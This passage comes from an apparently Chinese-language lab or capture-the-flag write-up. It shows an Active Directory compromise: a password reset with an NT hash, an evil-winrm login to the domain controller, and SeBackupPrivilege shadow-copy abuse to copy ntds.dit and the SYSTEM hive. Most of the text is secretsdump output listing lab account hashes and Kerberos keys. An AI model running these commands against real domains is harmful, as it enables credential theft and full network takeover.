└─# proxychains -q nxc smb 172.22.20.25 -u svc_bkpadmin -H f2f3e075ca082813f0d8191f947b0e01 -M change-password -o NEWPASS=Ad
min123
SMB 172.22.20.25 445 FPSRVAD01 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVAD01) (domain:fpcorp.int) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.22.20.25 445 FPSRVAD01 [-] fpcorp.int\svc_bkpadmin:f2f3e075ca082813f0d8191f947b0e01 STATUS_PASSWORD_EXPIRED
CHANGE-P... 172.22.20.25 445 FPSRVAD01 [+] Successfully changed password for svc_bkpadmin
8. FPSRVAD01 172.22.20.25 域控
8.1. Winrm
利用 svc_bkpadmin 用户的票据直接winrm登录到域控上
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q evil-winrm -i 172.22.20.25 -u svc_bkpadmin -p Admin123
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_bkpadmin\Documents> whoami
fpcorp\svc_bkpadmin
8.2. 卷影副本
卷影副本
查看当前用户权限发现有 SeBackupPrivilege ,这个权限可以用于进行卷影副本利用
*Evil-WinRM* PS C:\Users\svc_bkpadmin\Documents> whoami /priv
特权信息
----------------------
特权名 描述 状态
============================= ================ ======
SeMachineAccountPrivilege 将工作站添加到域 已启用
>>>> SeBackupPrivilege 备份文件和目录 已启用
SeRestorePrivilege 还原文件和目录 已启用
SeShutdownPrivilege 关闭系统 已启用
SeChangeNotifyPrivilege 绕过遍历检查 已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已启用
相关利用参考:Windows Privilege Escalation: SeBackupPrivilege - Hacking Articles
首先建一个临时目录
*Evil-WinRM* PS C:\Users\svc_bkpadmin\Documents> mkdir c:\temp
目录: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/10/2025 4:26 PM temp
*Evil-WinRM* PS C:\Users\svc_bkpadmin\Documents> cd c:\temp
然后在kali上新建一个文件,下面是文件内容
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:
转换一下格式 ,兼容windows
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# unix2dos raj.dsh
unix2dos: converting file raj.dsh to DOS format...
然后上传上去
*Evil-WinRM* PS C:\temp> upload raj.dsh
然后执行下面的操作
#创建卷影副本
*Evil-WinRM* PS C:\temp> diskshadow /s raj.dsh
#从卷影备份的Z盘中复制 NTDS.dit
*Evil-WinRM* PS C:\temp> robocopy /b z:\windows\ntds . ntds.dit
#保存注册表的 SYSTEM 配置单元
*Evil-WinRM* PS C:\temp> reg save hklm\system c:\Temp\system
然后下载 SYSTEM 和 NTDS.dit 本地解密即可
*Evil-WinRM* PS C:\temp> download ntds.dit
*Evil-WinRM* PS C:\temp> download system
Warning
注意: 这里下载system和ntds.dit时可能会因为文件过大导致域控宕机,建议分片后再下载,(这里我第一次下载system时就宕机了 :( )
8.3. ntds.dit
然后本地使用 impacket-secretsdump 解密ntds.dit
GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# impacket-secretsdump -ntds ntds.dit -system system local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x0cb60b80ef59101bdd56ead1fd31b7ab
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: bb3e7740c907449bc3af752e29efd442
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:972ffc4a036603066d388a1e28b4f583:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
FPSRVAD01$:1000:aad3b435b51404eeaad3b435b51404ee:bdece5c0a26bdc2fde6c5fe411ebd0b1:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b70e6f2681a7677a5bb97f5f38e9a5e6:::
FPITWKS101$:1103:aad3b435b51404eeaad3b435b51404ee:84bb2e34c8df3ff887870909976068ba:::
FPSRVFS02$:1104:aad3b435b51404eeaad3b435b51404ee:de2274d3118869946d89657ac76321b9:::
FPSRVIIS03$:1105:aad3b435b51404eeaad3b435b51404ee:ef9128f91d1242e8e9854d265c81b460:::
fpcorp.int\liu_5:1106:aad3b435b51404eeaad3b435b51404ee:566281ddddd872d4f57b25cc8ad3f63b:::
fpcorp.int\yang.8:1107:aad3b435b51404eeaad3b435b51404ee:cbbb3570e77f4cc93843e43678984dd7:::
fpcorp.int\yang.43:1108:aad3b435b51404eeaad3b435b51404ee:b25cf9bdd10f1ebf00244de2e2f123a8:::
fpcorp.int\wang.i67:1109:aad3b435b51404eeaad3b435b51404ee:8f69300610bdcd2cb041573091e08134:::
fpcorp.int\huang.82:1110:aad3b435b51404eeaad3b435b51404ee:776ff0cab0f813f8c44751943c17503d:::
fpcorp.int\zhou_8:1111:aad3b435b51404eeaad3b435b51404ee:040df5f5ae352b4013137880660982ef:::
fpcorp.int\yang921:1112:aad3b435b51404eeaad3b435b51404ee:e35c91b7997f7d4fa9e62c5470e9e5ba:::
fpcorp.int\li.42:1113:aad3b435b51404eeaad3b435b51404ee:6ebfc64931f9df0e2eea35f71ab9c242:::
fpcorp.int\chen.i39:1114:aad3b435b51404eeaad3b435b51404ee:6c7076e5bd5405d60e9ddf57b4fc1038:::
fpcorp.int\huang.i12:1115:aad3b435b51404eeaad3b435b51404ee:cc7c6fff20d6bbb20278124b239f1eca:::
fpcorp.int\liu845:1116:aad3b435b51404eeaad3b435b51404ee:4aed53b989c44eaf72634d15cd087c7a:::
fpcorp.int\huang_7:1117:aad3b435b51404eeaad3b435b51404ee:f4888ec3668c5e66a72c746c77da59eb:::
fpcorp.int\chen_i2:1118:aad3b435b51404eeaad3b435b51404ee:9ad8d58830a8ae364e443cbe33625f2b:::
fpcorp.int\wu.h3:1119:aad3b435b51404eeaad3b435b51404ee:9280caee51d6689d2eefec05e159d9b3:::
fpcorp.int\huang_9:1120:aad3b435b51404eeaad3b435b51404ee:504a5d237d857f840ae3d0b0dc7800e9:::
fpcorp.int\wang137:1121:aad3b435b51404eeaad3b435b51404ee:1fa7f369160fd6c51a7b67a06a68c231:::
fpcorp.int\wang_a4:1122:aad3b435b51404eeaad3b435b51404ee:e47d263fb145ed29daae2cb29d2a1962:::
fpcorp.int\zhang_e9:1123:aad3b435b51404eeaad3b435b51404ee:b7ddff540fcc55c0b3b9fd6875595f01:::
fpcorp.int\wang.a27:1124:aad3b435b51404eeaad3b435b51404ee:021dfdff65a9dd7030a90a8998a3a71e:::
fpcorp.int\zhao_4:1125:aad3b435b51404eeaad3b435b51404ee:fb3aae4f3c5be38f28992cbc9d6e2eb5:::
fpcorp.int\wang305:1126:aad3b435b51404eeaad3b435b51404ee:69e847665fcba0dd9af2f11123dbc297:::
fpcorp.int\yang.u66:1127:aad3b435b51404eeaad3b435b51404ee:ec4bddbf12ced787d1b0449ca80d661f:::
fpcorp.int\wu_h8:1128:aad3b435b51404eeaad3b435b51404ee:15e303fdbcba0e8ddcb77e2b5ed63a15:::
fpcorp.int\huang653:1129:aad3b435b51404eeaad3b435b51404ee:0798abaac8f56e123b09da8cee621fc8:::
fpcorp.int\zhang_a8:1130:aad3b435b51404eeaad3b435b51404ee:0285941688e405f0b2f57763a2eb19bb:::
fpcorp.int\liu199:1131:aad3b435b51404eeaad3b435b51404ee:456189d50c76e703651c01196954fe42:::
fpcorp.int\wu.i94:1132:aad3b435b51404eeaad3b435b51404ee:261360e14755f45315c20f6e376753ee:::
fpcorp.int\wang.i72:1133:aad3b435b51404eeaad3b435b51404ee:0e13c51339a6f72ef9f43e0e4765e4c7:::
fpcorp.int\wang.17:1134:aad3b435b51404eeaad3b435b51404ee:ef554b2303f711ad90ed6743e1e4d7d9:::
fpcorp.int\zhang639:1135:aad3b435b51404eeaad3b435b51404ee:cfcba0e487e5ff6ff3a9b5726bfe8b0d:::
fpcorp.int\wu_h4:1136:aad3b435b51404eeaad3b435b51404ee:8b799830fc3e323e1505fefe3171e0bb:::
fpcorp.int\huang_2:1137:aad3b435b51404eeaad3b435b51404ee:776006f165814c365f36cb40072e6d04:::
fpcorp.int\liu654:1138:aad3b435b51404eeaad3b435b51404ee:9d0692eade0a6529acb5f0b122ae8763:::
fpcorp.int\liu257:1139:aad3b435b51404eeaad3b435b51404ee:e86eaca7be9dd8da556871b474645944:::
fpcorp.int\zhou_6:1140:aad3b435b51404eeaad3b435b51404ee:f79c38c79331dfd7416eb17d405838fe:::
fpcorp.int\li_a3:1141:aad3b435b51404eeaad3b435b51404ee:c5fbf7ecbfe1b83251ab83974803ba5a:::
fpcorp.int\zhao427:1142:aad3b435b51404eeaad3b435b51404ee:b4c136a4d3b876e86b11d101b7116762:::
fpcorp.int\zhou.a74:1143:aad3b435b51404eeaad3b435b51404ee:9604bbca8e2e70bcd920f97f756f78f7:::
fpcorp.int\zhou.36:1144:aad3b435b51404eeaad3b435b51404ee:53f8eed5c8dc3f0fa5afe1c32762fd89:::
fpcorp.int\huang661:1145:aad3b435b51404eeaad3b435b51404ee:05e6bedd3d66ba76b29b51d5932e849b:::
fpcorp.int\wang.79:1146:aad3b435b51404eeaad3b435b51404ee:68fd9704bd9f1fc03489cb83f48dd26f:::
fpcorp.int\wu_2:1147:aad3b435b51404eeaad3b435b51404ee:3629b169acd48e7d1ccc670198dcc1b7:::
fpcorp.int\zhao.42:1148:aad3b435b51404eeaad3b435b51404ee:2a409ff1495362697742f7ed741a3f60:::
fpcorp.int\zhou_i3:1149:aad3b435b51404eeaad3b435b51404ee:4b2bf1700fad4c2bcbae77c8eeef7a10:::
fpcorp.int\liu_6:1150:aad3b435b51404eeaad3b435b51404ee:b287e6b317dcee19519952124735bb19:::
fpcorp.int\huang.50:1151:aad3b435b51404eeaad3b435b51404ee:9be7c428aaeec2b2f973169831146bbf:::
fpcorp.int\wang_a3:1152:aad3b435b51404eeaad3b435b51404ee:93743cd02ccae21054c1fb91fa46f82b:::
fpcorp.int\huang309:1153:aad3b435b51404eeaad3b435b51404ee:7fa54b7edde5364ad1d0ccf032d79069:::
fpcorp.int\zhao_8:1154:aad3b435b51404eeaad3b435b51404ee:aa1e234e893b396a3d88e51af6c4329c:::
fpcorp.int\liu386:1155:aad3b435b51404eeaad3b435b51404ee:69c3e08177159c37fd234aae6e113a6d:::
fpcorp.int\chen.33:1156:aad3b435b51404eeaad3b435b51404ee:7de86ea205e464de4e63a28e95ea9a65:::
fpcorp.int\wu603:1157:aad3b435b51404eeaad3b435b51404ee:a1e0f7d01f3cc73f974492b15232e51c:::
fpcorp.int\wu.a64:1158:aad3b435b51404eeaad3b435b51404ee:363e9bb7d59138718e715008f9c7fab4:::
fpcorp.int\wang.i73:1159:aad3b435b51404eeaad3b435b51404ee:322d1f69fe6a617dcf3495a924365637:::
fpcorp.int\liu.i37:1160:aad3b435b51404eeaad3b435b51404ee:1778999040a19505ee43194a656ac843:::
fpcorp.int\zhang871:1161:aad3b435b51404eeaad3b435b51404ee:b67f8ede47d039ae0dcd368b228e97c7:::
fpcorp.int\yang441:1162:aad3b435b51404eeaad3b435b51404ee:6806f17bdbb7977cc395b798bd8a4ccd:::
fpcorp.int\li515:1163:aad3b435b51404eeaad3b435b51404ee:d9e1cb87f4b4683e935df22abfd8df95:::
fpcorp.int\chen.i15:1164:aad3b435b51404eeaad3b435b51404ee:855c766d682c20d788812c9aae42cd77:::
fpcorp.int\wu_3:1165:aad3b435b51404eeaad3b435b51404ee:41c4bd4cfe75c405f0884729f7160c8f:::
fpcorp.int\wu753:1166:aad3b435b51404eeaad3b435b51404ee:b8179a65292ad76bfe2c2d935aa4913b:::
fpcorp.int\zhao_6:1167:aad3b435b51404eeaad3b435b51404ee:097d495848ca8b7ffaa5b07fd2ccac91:::
fpcorp.int\zhou.88:1168:aad3b435b51404eeaad3b435b51404ee:24c04ccc852169bf5520a8e601a17b9a:::
fpcorp.int\chen535:1169:aad3b435b51404eeaad3b435b51404ee:d7d5c4994afd0937b2bf23d5a4d4acad:::
fpcorp.int\wu.63:1170:aad3b435b51404eeaad3b435b51404ee:82610602dc4c65ce93a7d5ac189fc656:::
fpcorp.int\liu511:1171:aad3b435b51404eeaad3b435b51404ee:a64ccea625c899ae22901db3ebecdfc4:::
fpcorp.int\li_4:1172:aad3b435b51404eeaad3b435b51404ee:4e8987c381321a5e803d687b56112263:::
fpcorp.int\li_a6:1173:aad3b435b51404eeaad3b435b51404ee:da78075e49e3bafb9c997a62db23e2b5:::
fpcorp.int\chen.i95:1174:aad3b435b51404eeaad3b435b51404ee:3cf0d24e7672cba10506c5ff0054f005:::
fpcorp.int\yang_a3:1175:aad3b435b51404eeaad3b435b51404ee:5b45dcdef203d00b8cce1af11cf64db5:::
svc_bkpadmin:1176:aad3b435b51404eeaad3b435b51404ee:f2f3e075ca082813f0d8191f947b0e01:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:df24c180d344f70f1ecb4384d5310dcf73de5bdb49347ae6f93ff1aa157a808f
Administrator:aes128-cts-hmac-sha1-96:f9cfc900b462330f6450ed88990d478b
Administrator:des-cbc-md5:ec325e9b2cfdfe6d
FPSRVAD01$:aes256-cts-hmac-sha1-96:23dc91fe9bc99f834d2e93db3e7351173563bcfc76837ac5a0a320a9ff6cc19d
FPSRVAD01$:aes128-cts-hmac-sha1-96:bcd066e2c0f469ebeb45414eb143bf21
FPSRVAD01$:des-cbc-md5:8592ae54795da84c
krbtgt:aes256-cts-hmac-sha1-96:a509693becfe3315a89e8877f2d2fbbb25609b6b99ab7691168ddaf7e102314c
krbtgt:aes128-cts-hmac-sha1-96:9fcb039ba0afa32f4294212e3f286d96
krbtgt:des-cbc-md5:5431f1439e291f10
FPITWKS101$:aes256-cts-hmac-sha1-96:92c5faadd7bf017c94035f476b013d7f89d584c65d21e2a5273b162327549f84
FPITWKS101$:aes128-cts-hmac-sha1-96:4b24dfd5ff95402c2d743cf710a63fc5
FPITWKS101$:des-cbc-md5:3df1c2ad1ac164b0
FPSRVFS02$:aes256-cts-hmac-sha1-96:f3b3233f932fd47760d3b9949c1fcee0f6523ae09a86056d016b034a52ad94d4
FPSRVFS02$:aes128-cts-hmac-sha1-96:310ff9ed02007ad07acdbb0965458119
FPSRVFS02$:des-cbc-md5:7c948a64837038b3
FPSRVIIS03$:aes256-cts-hmac-sha1-96:cf8e5a4690916e144b489faadca097e44b3d62f2f0562058e0b2e82ffaa170c9
FPSRVIIS03$:aes128-cts-hmac-sha1-96:ee7f66e3cd26d32377625c6b098ff6fa
FPSRVIIS03$:des-cbc-md5:4a3d388cbc380d1f
fpcorp.int\liu_5:aes256-cts-hmac-sha1-96:22fa125fbc6fd8948be825334c68f01e84de1cd7d33fa468f6369760a75ae63e
fpcorp.int\liu_5:aes128-cts-hmac-sha1-96:fd398e60be83c10afc17a3039717e99e
fpcorp.int\liu_5:des-cbc-md5:c245545416fe5467
fpcorp.int\yang.8:aes256-cts-hmac-sha1-96:600ef8460c05fc5173f1b39dbf982337b345639ff5fdd56278f9b4a455d6a301
fpcorp.int\yang.8:aes128-cts-hmac-sha1-96:f1eaddf5ef9c5b52e4afe1b123f1489e
fpcorp.int\yang.8:des-cbc-md5:57bfe6389b0289fe
fpcorp.int\yang.43:aes256-cts-hmac-sha1-96:19a26d2a79493d7d9a91db80bf27955432150f5a6c30ce21735cba498f946191
fpcorp.int\yang.43:aes128-cts-hmac-sha1-96:97a50a47f6ee31d7bd8ac9b60c618fea
fpcorp.int\yang.43:des-cbc-md5:4fb5a4c7e9fefbcd
fpcorp.int\wang.i67:aes256-cts-hmac-sha1-96:f0152fed75c6872fa0934dad6d0a1bdc3d2ec0cc74fca5421ba116c9b1a54e0d
fpcorp.int\wang.i67:aes128-cts-hmac-sha1-96:b54f3451755d8c2083647b2e20a03a05
fpcorp.int\wang.i67:des-cbc-md5:cd0d79cba2a4a8e5
fpcorp.int\huang.82:aes256-cts-hmac-sha1-96:13b807ea6eb8fcdfd7923b2a400c23bc38575e4ad1f71dd4a86b270b7a484e90
fpcorp.int\huang.82:aes128-cts-hmac-sha1-96:bb2ecb5b89b9257d51df3748dc1b35f3
fpcorp.int\huang.82:des-cbc-md5:fe3da19dad9897ad
fpcorp.int\zhou_8:aes256-cts-hmac-sha1-96:b178717546c93d234b193d467ff54e7ad14733f1b0509c39fa1d1eddedff0045
fpcorp.int\zhou_8:aes128-cts-hmac-sha1-96:4cd6a61a52592b91df56180fe9cb34eb
fpcorp.int\zhou_8:des-cbc-md5:a84c456210342aa4
fpcorp.int\yang921:aes256-cts-hmac-sha1-96:fee943a97c4e868d72a756f4f157109ab2cb81202a3ff7779e8200461c52a68e
fpcorp.int\yang921:aes128-cts-hmac-sha1-96:dfdf5f6cd645bf07db55c428adde7df4
fpcorp.int\yang921:des-cbc-md5:6b6d9d46765125fe
fpcorp.int\li.42:aes256-cts-hmac-sha1-96:e242e7c0729f55b1baa7b3026d6f1d62ff58882ed5c4ed8e69f97b5785d11f17
fpcorp.int\li.42:aes128-cts-hmac-sha1-96:3d78ee38d7a273a72d3f9c81b91c35b7
fpcorp.int\li.42:des-cbc-md5:f7c401f140861340
fpcorp.int\chen.i39:aes256-cts-hmac-sha1-96:badc2498011c5f31cad4a4373f9e3527aa52dcc95b9070be0ca129c33ef8b385
fpcorp.int\chen.i39:aes128-cts-hmac-sha1-96:3e00cad883551c0143a0e4912eb4f9bd
fpcorp.int\chen.i39:des-cbc-md5:10a8e31083687343
fpcorp.int\huang.i12:aes256-cts-hmac-sha1-96:a192877440c93cf8a11f89be551a60a1f6d29dc555ed82ca3d4817e867554056
fpcorp.int\huang.i12:aes128-cts-hmac-sha1-96:a83a397471100ffa1a2cab616079f8ce
fpcorp.int\huang.i12:des-cbc-md5:103dec6b3d0e3bae
fpcorp.int\liu845:aes256-cts-hmac-sha1-96:379913e089742cf27ae9477e392adf357da0ad5704ab6279b3ce0457c4ac134e
fpcorp.int\liu845:aes128-cts-hmac-sha1-96:f5a2ea26bf6d7971b154da43449c3f59
fpcorp.int\liu845:des-cbc-md5:8983d945702534ba
fpcorp.int\huang_7:aes256-cts-hmac-sha1-96:2cf2f3979ded66c25788011dc408dd4d292ecb5ebaf2ad257294f10c48e20137
fpcorp.int\huang_7:aes128-cts-hmac-sha1-96:c468e179fb444194050e05afb4ee6cb3
fpcorp.int\huang_7:des-cbc-md5:159810d60113130d
fpcorp.int\chen_i2:aes256-cts-hmac-sha1-96:e2434b929b4ac043eefb2e9a77de6eb9f706eaa9597af8d54a967234896b4219
fpcorp.int\chen_i2:aes128-cts-hmac-sha1-96:72cb28b99bb88dbce38c743605901690
fpcorp.int\chen_i2:des-cbc-md5:cbf1fdf245518031
fpcorp.int\wu.h3:aes256-cts-hmac-sha1-96:f11709ac93a01f1abdba25d20def88221458cb303436d6fcfa5bedef271ec183
fpcorp.int\wu.h3:aes128-cts-hmac-sha1-96:5a6aae9ecb15e324e70226cb43fd13d6
fpcorp.int\wu.h3:des-cbc-md5:dc16d5759ecdbccd
fpcorp.int\huang_9:aes256-cts-hmac-sha1-96:74aa602a2df7e5553a479aba54015f9de631ad15b4a5dc730dff7ac974ce9cea
fpcorp.int\huang_9:aes128-cts-hmac-sha1-96:c2406981d60a633ebd18e81b740ea9d7
fpcorp.int\huang_9:des-cbc-md5:6b26b9e3204967bf
fpcorp.int\wang137:aes256-cts-hmac-sha1-96:8b9df49172e3ec44397bff28e1aa7018b50fdc485113f5d658e03709d9508d57
fpcorp.int\wang137:aes128-cts-hmac-sha1-96:bf58c5ab41e5d55c8f3244209b07e480
fpcorp.int\wang137:des-cbc-md5:e62545f416517f40
fpcorp.int\wang_a4:aes256-cts-hmac-sha1-96:53d6493fb84a70a144948223c48b1377f7808129e85aa0c791d83bbb6b8c8db6
fpcorp.int\wang_a4:aes128-cts-hmac-sha1-96:2243a18c4eb1821083f730a845281edb
fpcorp.int\wang_a4:des-cbc-md5:3220ce164a3ecd3e
fpcorp.int\zhang_e9:aes256-cts-hmac-sha1-96:9cb2696bb82dc08dc6f9718f07396b8d939573e32131681dfd231efe8009fa49
fpcorp.int\zhang_e9:aes128-cts-hmac-sha1-96:4b5fae0670228a3245a956ce2bcb3246
fpcorp.int\zhang_e9:des-cbc-md5:13e60d6e9b3dab34
fpcorp.int\wang.a27:aes256-cts-hmac-sha1-96:0bf5afe2117314f1db9d5d7c1a62d5829e6f90c9866b8ab9c7a4df74b7e5d856
fpcorp.int\wang.a27:aes128-cts-hmac-sha1-96:9dcc42808c9055cd76ebd528f0860b3f
fpcorp.int\wang.a27:des-cbc-md5:c81fda2f32382ff1
fpcorp.int\zhao_4:aes256-cts-hmac-sha1-96:6fd911ca8a7f1c3d70ddb969487c1ab463788ea71a5344f3a8ef15f0f1388983
fpcorp.int\zhao_4:aes128-cts-hmac-sha1-96:526ee194ef7a0cd902a3746c33ead219
fpcorp.int\zhao_4:des-cbc-md5:f132d07abc7a6764
fpcorp.int\wang305:aes256-cts-hmac-sha1-96:c2602e4067c6427bd74807f5da4605e764a836eaebc77559f2de82d94c4c353c
fpcorp.int\wang305:aes128-cts-hmac-sha1-96:e197c8726abd92e994b35ae67729663c
fpcorp.int\wang305:des-cbc-md5:1508ab022a1697ab
fpcorp.int\yang.u66:aes256-cts-hmac-sha1-96:abd032c1e8285dbe9cb030ae495033807f03626e3d005c4ba0f7dcec0b434bd3
fpcorp.int\yang.u66:aes128-cts-hmac-sha1-96:44e2072253e966456dc05637820cce4e
fpcorp.int\yang.u66:des-cbc-md5:e9b02aa1f494796e
fpcorp.int\wu_h8:aes256-cts-hmac-sha1-96:1616c3d4b87434f474db37ed37d0bac7f85cbe2ddc81f7d3bdc7294ad5c617ec
fpcorp.int\wu_h8:aes128-cts-hmac-sha1-96:ae09cbd4fff6d4caa4723ccc18fb5795
fpcorp.int\wu_h8:des-cbc-md5:07d5736123d913bc
fpcorp.int\huang653:aes256-cts-hmac-sha1-96:ab902f146a56c0a33f282e3db1248f0d1f66b1f44e21b276f6182f70c751c877
fpcorp.int\huang653:aes128-cts-hmac-sha1-96:cd0d1d11fd1d719c395349977298fcec
fpcorp.int\huang653:des-cbc-md5:49f2bc54f14a46ce
fpcorp.int\zhang_a8:aes256-cts-hmac-sha1-96:f31f7af596d18ab862cd00b2139258df3530002750c6cf8eb0329381c4c2bdf7
fpcorp.int\zhang_a8:aes128-cts-hmac-sha1-96:266960d20d1e8940117dc695598e7534
fpcorp.int\zhang_a8:des-cbc-md5:b576801f7a8591c4
fpcorp.int\liu199:aes256-cts-hmac-sha1-96:f5e2b9e6d0888a6dbeffa2fbd911d9947ad5500d56e479c7985042e0fa8ea987
fpcorp.int\liu199:aes128-cts-hmac-sha1-96:8400278cbc8a3c474efad91c04cb2bfd
fpcorp.int\liu199:des-cbc-md5:4532081a2fcbbfe5
fpcorp.int\wu.i94:aes256-cts-hmac-sha1-96:e9466f911c030422b8f51ca6279a3981fb5a2d5c823c300113f8dae2c8a5f22d
fpcorp.int\wu.i94:aes128-cts-hmac-sha1-96:81950d5b50d4eff80d2de78598f97392
fpcorp.int\wu.i94:des-cbc-md5:b04054860e15dcf4
fpcorp.int\wang.i72:aes256-cts-hmac-sha1-96:ff758d1858dcd556f951c238be4202c18c46167e0bc6efb1f4c2551c10af6f57
fpcorp.int\wang.i72:aes128-cts-hmac-sha1-96:19b64b4bf48d0beaedd10c3b84ad713f
fpcorp.int\wang.i72:des-cbc-md5:ad152fbf54c4c2e5
fpcorp.int\wang.17:aes256-cts-hmac-sha1-96:8861d052c5cc63d1ad14dae13258916fdc5bfd39686623c3fb87f4d0eef09d2a
fpcorp.int\wang.17:aes128-cts-hmac-sha1-96:768ca4161fd48dbfa345d640d7d2c512
fpcorp.int\wang.17:des-cbc-md5:a2ece03b863bd6fe
fpcorp.int\zhang639:aes256-cts-hmac-sha1-96:a80b36cf45491325bd17fb6898b840fe2396220fcfa7d73f15a76f55bd36f32d
fpcorp.int\zhang639:aes128-cts-hmac-sha1-96:db2edf5f7124774fb15ff0806a956987
fpcorp.int\zhang639:des-cbc-md5:944cab515db69d23
fpcorp.int\wu_h4:aes256-cts-hmac-sha1-96:0a57fb6b7346a0758c58a342ed99ed66582e20b23ae70da235c0f6c19cba6307
fpcorp.int\wu_h4:aes128-cts-hmac-sha1-96:338a48e2a7352e6f1899767ae345c0f5
fpcorp.int\wu_h4:des-cbc-md5:588a3b1f38616b02
fpcorp.int\huang_2:aes256-cts-hmac-sha1-96:947f0270c63062aaf021046759f9ffdba5425bb0a3ae5ecb9d9f7caad0dd8e04
fpcorp.int\huang_2:aes128-cts-hmac-sha1-96:547320fe2cd05961f616fbf412b26d13
fpcorp.int\huang_2:des-cbc-md5:5d9ba16110797983
fpcorp.int\liu654:aes256-cts-hmac-sha1-96:afd3184894a140783e20cc2856b48e1000f6d6e67d47e37a7165f0232fe8b652
fpcorp.int\liu654:aes128-cts-hmac-sha1-96:cb0d8760e46d23b396ab12f747c41527
fpcorp.int\liu654:des-cbc-md5:38dcd07ccdbcece9
fpcorp.int\liu257:aes256-cts-hmac-sha1-96:109ced5e6cfdcc9340abc19a3684f4692d599c1706b99b38c416736769883103
fpcorp.int\liu257:aes128-cts-hmac-sha1-96:6937811b4175ae899cf879d29090052a
fpcorp.int\liu257:des-cbc-md5:a20298c18c68bfda
fpcorp.int\zhou_6:aes256-cts-hmac-sha1-96:24881d97cc2b1a0c90da6e08da3db2d5e8af512fb8690cde124fcbd5e2fa2ca4
fpcorp.int\zhou_6:aes128-cts-hmac-sha1-96:88a766be0481880dfa1053ad1b801972
fpcorp.int\zhou_6:des-cbc-md5:b06116165dbaa17f
fpcorp.int\li_a3:aes256-cts-hmac-sha1-96:77602d70dfff44dffaaed1778e70ecde0f387876a27ae2940282643e2c437c53
fpcorp.int\li_a3:aes128-cts-hmac-sha1-96:3729ecb45004653a491b31126de5b007
fpcorp.int\li_a3:des-cbc-md5:cb85106268fbe5dc
fpcorp.int\zhao427:aes256-cts-hmac-sha1-96:3d5821314afca3557799794a98e04c1e02cefe189e75a885878f2c21cfba7a22
fpcorp.int\zhao427:aes128-cts-hmac-sha1-96:7399ebeb58f263eae63169f090d69dad
fpcorp.int\zhao427:des-cbc-md5:020b3d9d4ffe51fd
fpcorp.int\zhou.a74:aes256-cts-hmac-sha1-96:c978c8c1fd7649ff41e39be2cc180b08ce4ec95a6e0cd04df36e0068152beb1c
fpcorp.int\zhou.a74:aes128-cts-hmac-sha1-96:38ade4eb8212044ba78fd9e2819a5277
fpcorp.int\zhou.a74:des-cbc-md5:0e7a19cbf2540197
fpcorp.int\zhou.36:aes256-cts-hmac-sha1-96:618b36a96831f2a251e9573952dfc49a231183fdd483d77157bf3e4c785111dd
fpcorp.int\zhou.36:aes128-cts-hmac-sha1-96:d9f788ceaf9cab2098ceeaad437c9e42
fpcorp.int\zhou.36:des-cbc-md5:f7c823154f92c88c
fpcorp.int\huang661:aes256-cts-hmac-sha1-96:eef97294893939e0ddbbf1aaea07b86250d3a09c9e533a31cb440e102d87a3b3
fpcorp.int\huang661:aes128-cts-hmac-sha1-96:a214050184f2648e2a7ca1dce4500989
fpcorp.int\huang661:des-cbc-md5:d9b53426b59eab7c
fpcorp.int\wang.79:aes256-cts-hmac-sha1-96:d093882dc4e26084787158e2cffc7ea42816a05eb5a48bf1935fa4cf3afe54b3
fpcorp.int\wang.79:aes128-cts-hmac-sha1-96:9b833a5a46bbf6e13fcc11247932f44c
fpcorp.int\wang.79:des-cbc-md5:5b07e3b6913826a1
fpcorp.int\wu_2:aes256-cts-hmac-sha1-96:5fef27dcb6c98a3a49b220cbb377a693bca22c807043dfd6bc07cf8c306d7b11
fpcorp.int\wu_2:aes128-cts-hmac-sha1-96:8d7a474a034b9835477a5a948858368d
fpcorp.int\wu_2:des-cbc-md5:ae9e85e59dd6376d
fpcorp.int\zhao.42:aes256-cts-hmac-sha1-96:576003b22b835c6f4fe6e42a6a67e58b2fd7e571013921fe979ae47f166c939a
fpcorp.int\zhao.42:aes128-cts-hmac-sha1-96:eba4befa59c087674b69a2eba2395a68
fpcorp.int\zhao.42:des-cbc-md5:b69e40df5eb64c4a
fpcorp.int\zhou_i3:aes256-cts-hmac-sha1-96:e24663e60692329fc920f744e2e756d54b74e85dcb3168ac760f9679e3c8cd75
fpcorp.int\zhou_i3:aes128-cts-hmac-sha1-96:b1de4677befa0032d29bab148c3a91e4
fpcorp.int\zhou_i3:des-cbc-md5:3efd542f080e1397
fpcorp.int\liu_6:aes256-cts-hmac-sha1-96:5c75983e28b6e69528fb4a5c568dbd0fc39d81311d4998af199d302289a31fd1
fpcorp.int\liu_6:aes128-cts-hmac-sha1-96:a720a5703dddc4d7dfd62bade140596c
fpcorp.int\liu_6:des-cbc-md5:f162d023fd0bb31c
fpcorp.int\huang.50:aes256-cts-hmac-sha1-96:c1c1241b137bd1063a7b3d4308236ced5a80fd8a3699fbcb526d07d45e9e7d04
fpcorp.int\huang.50:aes128-cts-hmac-sha1-96:0d4e53895f6c1e989315c300c766393e
fpcorp.int\huang.50:des-cbc-md5:83fb19fdb01f1331
fpcorp.int\wang_a3:aes256-cts-hmac-sha1-96:345b04bf34eaa357932bb6d3d43ce402c15da88f7885072ca367a250f8da0c8f
fpcorp.int\wang_a3:aes128-cts-hmac-sha1-96:45b3eba8835a3a81e7c1a7cb5aa0e1c1
